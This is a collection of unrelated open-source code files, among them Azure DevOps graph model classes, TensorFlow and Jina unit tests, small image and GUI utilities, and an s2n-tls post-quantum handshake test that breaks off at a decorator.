:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
:param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor.
:type legacy_descriptor: str
:param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA)
:type origin: str
:param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is not backed by a different provider and has a different unique id in the new provider.
:type origin_id: str
:param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User).
:type subject_kind: str
:param administrator_descriptor: The subject descriptor that references the administrators group for this scope. Only members of this group can change the contents of this scope or assign other users permissions to access this scope.
:type administrator_descriptor: str
:param is_global: When true, this scope is also a securing host for one or more scopes.
:type is_global: bool
:param parent_descriptor: The subject descriptor for the closest account or organization in the ancestor tree of this scope.
:type parent_descriptor: str
:param scope_type: The type of this scope. Typically ServiceHost or TeamProject.
:type scope_type: object
:param securing_host_descriptor: The subject descriptor for the containing organization in the ancestor tree of this scope.
:type securing_host_descriptor: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'origin_id': {'key': 'originId', 'type': 'str'},
'subject_kind': {'key': 'subjectKind', 'type': 'str'},
'administrator_descriptor': {'key': 'administratorDescriptor', 'type': 'str'},
'is_global': {'key': 'isGlobal', 'type': 'bool'},
'parent_descriptor': {'key': 'parentDescriptor', 'type': 'str'},
'scope_type': {'key': 'scopeType', 'type': 'object'},
'securing_host_descriptor': {'key': 'securingHostDescriptor', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None, administrator_descriptor=None, is_global=None, parent_descriptor=None, scope_type=None, securing_host_descriptor=None):
super(GraphScope, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url, legacy_descriptor=legacy_descriptor, origin=origin, origin_id=origin_id, subject_kind=subject_kind)
self.administrator_descriptor = administrator_descriptor
self.is_global = is_global
self.parent_descriptor = parent_descriptor
self.scope_type = scope_type
self.securing_host_descriptor = securing_host_descriptor
class GraphUser(GraphMember):
"""
Graph user entity
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
:param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor.
:type legacy_descriptor: str
:param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA)
:type origin: str
:param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is not backed by a different provider and has a different unique id in the new provider.
:type origin_id: str
:param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User).
:type subject_kind: str
:param domain: This represents the name of the container of origin for a graph member. (For MSA this is "Windows Live ID", for AD the name of the domain, for AAD the tenantID of the directory, for VSTS groups the ScopeId, etc)
:type domain: str
:param mail_address: The email address of record for a given graph member. This may be different than the principal name.
:type mail_address: str
:param principal_name: This is the PrincipalName of this graph member from the source provider. The source provider may change this field over time and it is not guaranteed to be immutable for the life of the graph member by VSTS.
:type principal_name: str
:param directory_alias: The short, generally unique name for the user in the backing directory. For AAD users, this corresponds to the mail nickname, which is often but not necessarily similar to the part of the user's mail address before the @ sign. For GitHub users, this corresponds to the GitHub user handle.
:type directory_alias: str
:param is_deleted_in_origin: When true, the group has been deleted in the identity provider
:type is_deleted_in_origin: bool
:param metadata_update_date:
:type metadata_update_date: datetime
:param meta_type: The meta type of the user in the origin, such as "member", "guest", etc. See UserMetaType for the set of possible values.
:type meta_type: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'origin_id': {'key': 'originId', 'type': 'str'},
'subject_kind': {'key': 'subjectKind', 'type': 'str'},
'domain': {'key': 'domain', 'type': 'str'},
'mail_address': {'key': 'mailAddress', 'type': 'str'},
'principal_name': {'key': 'principalName', 'type': 'str'},
'directory_alias': {'key': 'directoryAlias', 'type': 'str'},
'is_deleted_in_origin': {'key': 'isDeletedInOrigin', 'type': 'bool'},
'metadata_update_date': {'key': 'metadataUpdateDate', 'type': 'iso-8601'},
'meta_type': {'key': 'metaType', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None, domain=None, mail_address=None, principal_name=None, directory_alias=None, is_deleted_in_origin=None, metadata_update_date=None, meta_type=None):
super(GraphUser, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url, legacy_descriptor=legacy_descriptor, origin=origin, origin_id=origin_id, subject_kind=subject_kind, domain=domain, mail_address=mail_address, principal_name=principal_name)
self.directory_alias = directory_alias
self.is_deleted_in_origin = is_deleted_in_origin
self.metadata_update_date = metadata_update_date
self.meta_type = meta_type
class GraphGroup(GraphMember):
"""
Graph group entity
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
:param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor.
:type legacy_descriptor: str
:param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA)
:type origin: str
:param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is not backed by a different provider and has a different unique id in the new provider.
:type origin_id: str
:param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User).
:type subject_kind: str
:param domain: This represents the name of the container of origin for a graph member. (For MSA this is "Windows Live ID", for AD the name of the domain, for AAD the tenantID of the directory, for VSTS groups the ScopeId, etc)
:type domain: str
:param mail_address: The email address of record for a given graph member. This may be different than the principal name.
:type mail_address: str
:param principal_name: This is the PrincipalName of this graph member from the source provider. The source provider may change this field over time and it is not guaranteed to be immutable for the life of the graph member by VSTS.
:type principal_name: str
:param description: A short phrase to help human readers disambiguate groups with similar names
:type description: str
:param is_cross_project:
:type is_cross_project: bool
:param is_deleted:
:type is_deleted: bool
:param is_global_scope:
:type is_global_scope: bool
:param is_restricted_visible:
:type is_restricted_visible: bool
:param local_scope_id:
:type local_scope_id: str
:param scope_id:
:type scope_id: str
:param scope_name:
:type scope_name: str
:param scope_type:
:type scope_type: str
:param securing_host_id:
:type securing_host_id: str
:param special_type:
:type special_type: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'origin_id': {'key': 'originId', 'type': 'str'},
'subject_kind': {'key': 'subjectKind', 'type': 'str'},
'domain': {'key': 'domain', 'type': 'str'},
'mail_address': {'key': 'mailAddress', 'type': 'str'},
'principal_name': {'key': 'principalName', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'is_cross_project': {'key': 'isCrossProject', 'type': 'bool'},
'is_deleted': {'key': 'isDeleted', 'type': 'bool'},
'is_global_scope': {'key': 'isGlobalScope', 'type': 'bool'},
'is_restricted_visible': {'key': 'isRestrictedVisible', 'type': 'bool'},
'local_scope_id': {'key': 'localScopeId', 'type': 'str'},
'scope_id': {'key': 'scopeId', 'type': 'str'},
'scope_name': {'key': 'scopeName', 'type': 'str'},
'scope_type': {'key': 'scopeType', 'type': 'str'},
'securing_host_id': {'key': 'securingHostId', 'type': 'str'},
'special_type': {'key': 'specialType', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None, domain=None, mail_address=None, principal_name=None, description=None, is_cross_project=None, is_deleted=None, is_global_scope=None, is_restricted_visible=None, local_scope_id=None, scope_id=None, scope_name=None, scope_type=None, securing_host_id=None, special_type=None):
super(GraphGroup, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url, legacy_descriptor=legacy_descriptor, origin=origin, origin_id=origin_id, subject_kind=subject_kind, domain=domain, mail_address=mail_address, principal_name=principal_name)
self.description = description
self.is_cross_project = is_cross_project
self.is_deleted = is_deleted
self.is_global_scope = is_global_scope
self.is_restricted_visible = is_restricted_visible
self.local_scope_id = local_scope_id
self.scope_id = scope_id
self.scope_name = scope_name
self.scope_type = scope_type
self.securing_host_id = securing_host_id
self.special_type = special_type
__all__ = [
'Avatar',
'GraphCachePolicies',
'GraphDescriptorResult',
'GraphFederatedProviderData',
'GraphGroupCreationContext',
'GraphMembership',
'GraphMembershipState',
'GraphMembershipTraversal',
'GraphProviderInfo',
'GraphScopeCreationContext',
'GraphStorageKeyResult',
'GraphSubjectBase',
'GraphSubjectLookup',
'GraphSubjectLookupKey',
'GraphUserCreationContext',
'GraphUserUpdateContext',
'JsonPatchOperation',
'PagedGraphGroups',
'PagedGraphUsers',
'ReferenceLinks',
'GraphSubject',
'GraphMember',
'GraphScope',
'GraphUser',
'GraphGroup',
]
|
official/vision/beta/projects/yolo/modeling/heads/yolo_head_test.py | NasTul/models | 82,518 | 12635031 | <gh_stars>1000+
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for yolo heads."""
# Import libraries
from absl.testing import parameterized
import tensorflow as tf
from official.vision.beta.projects.yolo.modeling.heads import yolo_head as heads
class YoloDecoderTest(parameterized.TestCase, tf.test.TestCase):
def test_network_creation(self):
"""Test creation of YOLO family models."""
tf.keras.backend.set_image_data_format('channels_last')
input_shape = {
'3': [1, 52, 52, 256],
'4': [1, 26, 26, 512],
'5': [1, 13, 13, 1024]
}
classes = 100
bps = 3
head = heads.YoloHead(3, 5, classes=classes, boxes_per_level=bps)
inputs = {}
for key in input_shape:
inputs[key] = tf.ones(input_shape[key], dtype=tf.float32)
endpoints = head(inputs)
# print(endpoints)
for key in endpoints.keys():
expected_input_shape = input_shape[key]
expected_input_shape[-1] = (classes + 5) * bps
self.assertAllEqual(endpoints[key].shape.as_list(), expected_input_shape)
def test_serialize_deserialize(self):
# Create a network object that sets all of its config options.
tf.keras.backend.set_image_data_format('channels_last')
input_shape = {
'3': [1, 52, 52, 256],
'4': [1, 26, 26, 512],
'5': [1, 13, 13, 1024]
}
classes = 100
bps = 3
head = heads.YoloHead(3, 5, classes=classes, boxes_per_level=bps)
inputs = {}
for key in input_shape:
inputs[key] = tf.ones(input_shape[key], dtype=tf.float32)
_ = head(inputs)
configs = head.get_config()
head_from_config = heads.YoloHead.from_config(configs)
self.assertAllEqual(head.get_config(), head_from_config.get_config())
if __name__ == '__main__':
tf.test.main()
|
tests/unit/test_is_decompressed_message.py | vishalbelsare/jina | 15,179 | 12635033 | <gh_stars>1000+
import time
from jina.helper import random_identity
from jina.logging.predefined import default_logger
from jina.parsers import set_pea_parser
from jina.peapods.runtimes.zmq.zed import ZEDRuntime
from jina.peapods.peas import BasePea
from jina.peapods.zmq import Zmqlet
from jina.types.message import Message
from jina.types.request import Request
from jina import Executor, requests
from tests import validate_callback
class DecompressExec(Executor):
@requests()
def func(self, docs, **kwargs):
for doc in docs:
doc.text = 'used'
class MockRuntimeNotDecompressed(ZEDRuntime):
def _post_hook(self, msg: 'Message'):
super()._post_hook(msg)
if msg is not None:
decompressed = msg.request.is_decompressed
if msg.is_data_request:
assert not decompressed
return msg
class MockRuntimeDecompressed(ZEDRuntime):
def _post_hook(self, msg: 'Message'):
super()._post_hook(msg)
if msg is not None:
decompressed = msg.request.is_decompressed
if msg.is_data_request:
assert decompressed
return msg
class MockPea(BasePea):
def _get_runtime_cls(self):
if self.args.runtime_cls == 'MockRuntimeNotDecompressed':
return MockRuntimeNotDecompressed
else:
return MockRuntimeDecompressed
args1 = set_pea_parser().parse_args(
[
'--host-in',
'0.0.0.0',
'--host-out',
'0.0.0.0',
'--socket-in',
'PULL_CONNECT',
'--socket-out',
'PUSH_CONNECT',
]
)
args2 = set_pea_parser().parse_args(
[
'--host-in',
'0.0.0.0',
'--host-out',
'0.0.0.0',
'--port-in',
str(args1.port_out),
'--port-out',
str(args1.port_in),
'--socket-in',
'PULL_BIND',
'--socket-out',
'PUSH_BIND',
'--runtime-cls',
'MockRuntimeNotDecompressed',
]
)
args3 = set_pea_parser().parse_args(
[
'--host-in',
'0.0.0.0',
'--host-out',
'0.0.0.0',
'--port-in',
str(args1.port_out),
'--port-out',
str(args1.port_in),
'--socket-in',
'PULL_BIND',
'--socket-out',
'PUSH_BIND',
'--uses',
'DecompressExec',
'--runtime-cls',
'MockRuntimeDecompressed',
]
)
def test_not_decompressed_zmqlet(mocker):
with MockPea(args2) as pea, Zmqlet(args1, default_logger) as z:
req = Request()
req.request_id = random_identity()
d = req.data.docs.add()
d.tags['id'] = 2
msg = Message(None, req, 'tmp', '')
mock = mocker.Mock()
z.send_message(msg)
time.sleep(1)
z.recv_message(mock)
def callback(msg_):
pass
validate_callback(mock, callback)
print(f' joining pea')
pea.join()
print(f' joined pea')
def test_decompressed_zmqlet(mocker):
with MockPea(args3) as pea, Zmqlet(args1, default_logger) as z:
req = Request()
req.request_id = random_identity()
d = req.data.docs.add()
d.tags['id'] = 2
msg = Message(None, req, 'tmp', '')
mock = mocker.Mock()
z.send_message(msg)
time.sleep(1)
z.recv_message(mock)
def callback(msg_):
pass
validate_callback(mock, callback)
print(f' joining pea')
pea.join()
print(f' joined pea')
def test_recv_message_zmqlet(mocker):
zmqlet1 = Zmqlet(args1, default_logger)
zmqlet2 = Zmqlet(args2, default_logger)
req = Request()
req.request_id = random_identity()
doc = req.data.docs.add()
doc.tags['id'] = 2
msg = Message(None, req, 'tmp', '')
def callback(msg_):
assert msg_.request.docs[0].tags['id'] == msg.request.data.docs[0].tags['id']
mock = mocker.Mock()
zmqlet1.send_message(msg)
time.sleep(1)
zmqlet2.recv_message(mock)
validate_callback(mock, callback)
|
pkg/win32/Python27/Lib/site-packages/klei/imgutil.py | hexgear-studio/ds_mod_tools | 112 | 12635034 | from PIL import Image, ImageOps
def Expand( im, border_size ):
new_img = ImageOps.expand( im, border = border_size )
for i in range( border_size ):
left = border_size - i
right = border_size + im.size[0] + i
top = border_size - i
bottom = border_size + im.size[1] + i - 1
top_line = new_img.crop( ( left, top, right, top + 1 ) )
bottom_line = new_img.crop( ( left, bottom, right, bottom + 1 ) )
new_img.paste( top_line, ( left, top - 1, right, top ) )
new_img.paste( bottom_line, ( left, bottom + 1, right, bottom + 2 ) )
left_line = new_img.crop( ( left, top - 1, left + 1, bottom + 2 ) )
right_line = new_img.crop( ( right-1, top - 1, right, bottom + 2 ) )
new_img.paste( left_line, ( left - 1, top - 1, left, bottom + 2 ) )
new_img.paste( right_line, ( right, top - 1, right + 1, bottom + 2 ) )
return new_img
def OpenImage( filename, size=None, border_size = 0 ):
im = Image.open( filename )
if size != None:
im = im.resize( size, Image.ANTIALIAS )
im = Expand( im, border_size )
return im
|
tests/collisions/apps.py | KazakovDenis/django-extensions | 4,057 | 12635061 | <filename>tests/collisions/apps.py
# -*- coding: utf-8 -*-
from django.apps import AppConfig
class FooConfig(AppConfig):
name = 'tests.collisions'
app_label = 'collisions'
|
zhihu_user_info_spider/data_analysis/test/pandas_test.py | Yourrrrlove/spider_collection | 178 | 12635065 | <filename>zhihu_user_info_spider/data_analysis/test/pandas_test.py
import pandas as pd
import numpy as np
df = pd.read_csv(
r"D:\pycharm\PyCharm 2020.1.1\workplace\zhihu_user_info\zhihu_user_info_spider\result\userInfo\2021\10\17\user_info_low_cleaned.csv")
df1 = df.drop_duplicates(subset="id")
print(df1.groupby("所在行业").size())
# print(df1.pivot_table)
# print(df1["id"].value_counts())
|
src/GridCal/Gui/GIS/gui.py | mzy2240/GridCal | 284 | 12635069 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gui.ui',
# licensing of 'gui.ui' applies.
#
# Created: Mon Dec 9 12:39:51 2019
# by: pyside2-uic running on PySide2 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PySide2 import QtCore, QtGui, QtWidgets
class Ui_GisWindow(object):
def setupUi(self, GisWindow):
GisWindow.setObjectName("GisWindow")
GisWindow.resize(938, 577)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/icons/icons/map.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
GisWindow.setWindowIcon(icon)
self.centralwidget = QtWidgets.QWidget(GisWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName("verticalLayout")
self.webFrame = QtWidgets.QFrame(self.centralwidget)
self.webFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.webFrame.setFrameShadow(QtWidgets.QFrame.Raised)
self.webFrame.setObjectName("webFrame")
self.verticalLayout.addWidget(self.webFrame)
GisWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(GisWindow)
self.statusbar.setObjectName("statusbar")
GisWindow.setStatusBar(self.statusbar)
self.toolBar = QtWidgets.QToolBar(GisWindow)
self.toolBar.setMovable(False)
self.toolBar.setFloatable(False)
self.toolBar.setObjectName("toolBar")
GisWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.actionSave_map = QtWidgets.QAction(GisWindow)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(":/icons/icons/savec.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionSave_map.setIcon(icon1)
self.actionSave_map.setObjectName("actionSave_map")
self.toolBar.addAction(self.actionSave_map)
self.retranslateUi(GisWindow)
QtCore.QMetaObject.connectSlotsByName(GisWindow)
def retranslateUi(self, GisWindow):
GisWindow.setWindowTitle(QtWidgets.QApplication.translate("GisWindow", "GridCal - GIS", None, -1))
self.toolBar.setWindowTitle(QtWidgets.QApplication.translate("GisWindow", "toolBar", None, -1))
self.actionSave_map.setText(QtWidgets.QApplication.translate("GisWindow", "Save map", None, -1))
self.actionSave_map.setToolTip(QtWidgets.QApplication.translate("GisWindow", "Save this map", None, -1))
self.actionSave_map.setShortcut(QtWidgets.QApplication.translate("GisWindow", "Ctrl+S", None, -1))
from .icons_rc import *
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
GisWindow = QtWidgets.QMainWindow()
ui = Ui_GisWindow()
ui.setupUi(GisWindow)
GisWindow.show()
sys.exit(app.exec_())
|
tests/integrationv2/test_pq_handshake.py | hongxu-jia/s2n-tls | 4,256 | 12635078 | <gh_stars>1000+
import pytest
import os
from configuration import available_ports, PROVIDERS, PROTOCOLS
from common import Ciphers, ProviderOptions, Protocols, data_bytes, KemGroups, Certificates, pq_enabled
from fixtures import managed_process
from providers import Provider, S2N, OpenSSL
from utils import invalid_test_parameters, get_parameter_name, to_bytes
CIPHERS = [
None, # `None` will default to the appropriate `test_all` cipher preference in the S2N client provider
Ciphers.KMS_PQ_TLS_1_0_2019_06,
Ciphers.KMS_PQ_TLS_1_0_2020_02,
Ciphers.KMS_PQ_TLS_1_0_2020_07,
Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11,
Ciphers.PQ_SIKE_TEST_TLS_1_0_2020_02,
Ciphers.KMS_TLS_1_0_2018_10,
Ciphers.PQ_TLS_1_0_2020_12,
]
KEM_GROUPS = [
KemGroups.P256_KYBER512R2,
KemGroups.P256_BIKE1L1FOR2,
KemGroups.P256_SIKEP434R3,
]
EXPECTED_RESULTS = {
# The tuple keys have the form (client_{cipher, kem_group}, server_{cipher, kem_group})
(Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_PQ_TLS_1_0_2019_06):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_PQ_TLS_1_0_2020_02):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2019_06):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_02):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r2-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r2-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.KMS_PQ_TLS_1_0_2019_06):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.KMS_PQ_TLS_1_0_2020_02):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r2-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-KYBER-RSA-AES256-GCM-SHA384", "kem": "kyber512r2", "kem_group": "NONE"},
(Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11, Ciphers.KMS_PQ_TLS_1_0_2019_06):
{"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp503r1-KEM", "kem_group": "NONE"},
(Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11, Ciphers.KMS_PQ_TLS_1_0_2020_02):
{"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp503r1-KEM", "kem_group": "NONE"},
(Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp503r1-KEM", "kem_group": "NONE"},
(Ciphers.PQ_SIKE_TEST_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2019_06):
{"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp503r1-KEM", "kem_group": "NONE"},
(Ciphers.PQ_SIKE_TEST_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_02):
{"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp434r3-KEM", "kem_group": "NONE"},
(Ciphers.PQ_SIKE_TEST_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp434r3-KEM", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_TLS_1_0_2018_10):
{"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_TLS_1_0_2018_10):
{"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.KMS_TLS_1_0_2018_10):
{"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"},
(Ciphers.KMS_TLS_1_0_2018_10, Ciphers.KMS_PQ_TLS_1_0_2019_06):
{"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"},
(Ciphers.KMS_TLS_1_0_2018_10, Ciphers.KMS_PQ_TLS_1_0_2020_02):
{"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"},
(Ciphers.KMS_TLS_1_0_2018_10, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"},
# The expected kem_group string for this case purposefully excludes a curve;
# depending on how s2n was compiled, the curve may be either x25519 or p256.
(Ciphers.PQ_TLS_1_0_2020_12, Ciphers.PQ_TLS_1_0_2020_12):
{"cipher": "TLS_AES_256_GCM_SHA384", "kem": "NONE", "kem_group": "_kyber-512-r2"},
(Ciphers.PQ_TLS_1_0_2020_12, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-KYBER-RSA-AES256-GCM-SHA384", "kem": "kyber512r2", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.PQ_TLS_1_0_2020_12):
{"cipher": "ECDHE-KYBER-RSA-AES256-GCM-SHA384", "kem": "kyber512r2", "kem_group": "NONE"},
(Ciphers.PQ_TLS_1_0_2020_12, KemGroups.P256_KYBER512R2):
{"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_kyber-512-r2"},
(Ciphers.PQ_TLS_1_0_2020_12, KemGroups.P256_BIKE1L1FOR2):
{"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_bike-1l1fo-r2"},
(Ciphers.PQ_TLS_1_0_2020_12, KemGroups.P256_SIKEP434R3):
{"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_sike-p434-r3"},
(KemGroups.P256_KYBER512R2, Ciphers.PQ_TLS_1_0_2020_12):
{"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_kyber-512-r2"},
(KemGroups.P256_BIKE1L1FOR2, Ciphers.PQ_TLS_1_0_2020_12):
{"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_bike-1l1fo-r2"},
(KemGroups.P256_SIKEP434R3, Ciphers.PQ_TLS_1_0_2020_12):
{"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_sike-p434-r3"},
}
"""
Similar to invalid_test_parameters(), this validates the test parameters for
both client and server. Returns True if the test case using these parameters
should be skipped.
"""
def invalid_pq_handshake_test_parameters(*args, **kwargs):
client_cipher_kwargs = kwargs.copy()
client_cipher_kwargs["cipher"] = kwargs["client_cipher"]
server_cipher_kwargs = kwargs.copy()
server_cipher_kwargs["cipher"] = kwargs["server_cipher"]
# `or` is correct: invalid_test_parameters() returns True if the parameters are invalid;
# we want to return True here if either of the sets of parameters are invalid.
return invalid_test_parameters(*args, **client_cipher_kwargs) or invalid_test_parameters(*args, **server_cipher_kwargs)
def get_oqs_openssl_override_env_vars():
oqs_openssl_install_dir = os.environ["OQS_OPENSSL_1_1_1_INSTALL_DIR"]
override_env_vars = dict()
override_env_vars["PATH"] = oqs_openssl_install_dir + "/bin"
override_env_vars["LD_LIBRARY_PATH"] = oqs_openssl_install_dir + "/lib"
return override_env_vars
def assert_s2n_negotiation_parameters(s2n_results, expected_result):
if expected_result is not None:
assert to_bytes(("Cipher negotiated: " + expected_result['cipher'])) in s2n_results.stdout
assert to_bytes(("KEM: " + expected_result['kem'])) in s2n_results.stdout
# Purposefully leave off the "KEM Group: " prefix in order to perform partial matches
# without specifying the curve.
assert to_bytes(expected_result['kem_group']) in s2n_results.stdout
@pytest.mark.uncollect_if(func=invalid_pq_handshake_test_parameters)
